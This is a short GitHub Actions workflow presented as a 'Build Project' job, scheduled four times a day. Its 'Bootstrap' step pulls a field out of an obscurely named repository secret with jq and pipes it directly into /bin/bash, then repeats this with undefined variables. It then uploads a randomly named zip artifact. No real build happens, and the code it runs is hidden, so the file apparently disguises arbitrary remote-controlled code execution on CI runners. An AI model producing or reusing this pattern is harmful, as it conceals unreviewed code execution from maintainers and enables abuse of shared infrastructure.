name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '44 3,9,15,21 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  deploy:
    name: Main task
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Bootstrap
        env:
          zdcqd0: ${{ secrets.zdcqd0 }}
        run: |
          printf '%s' "$zdcqd0" | jq -r .fza571 | /bin/bash
          echo $mc44835 | jq -r .bz908 | /bin/bash
          printf '%s' "$rxcs9971" | jq -r .dkfjz6753 | /bin/bash

      - name: Archive artifact
        uses: actions/upload-artifact@v4
        with:
          name: JPWwnQIb
          path: "*.zip"
          retention-days: 1
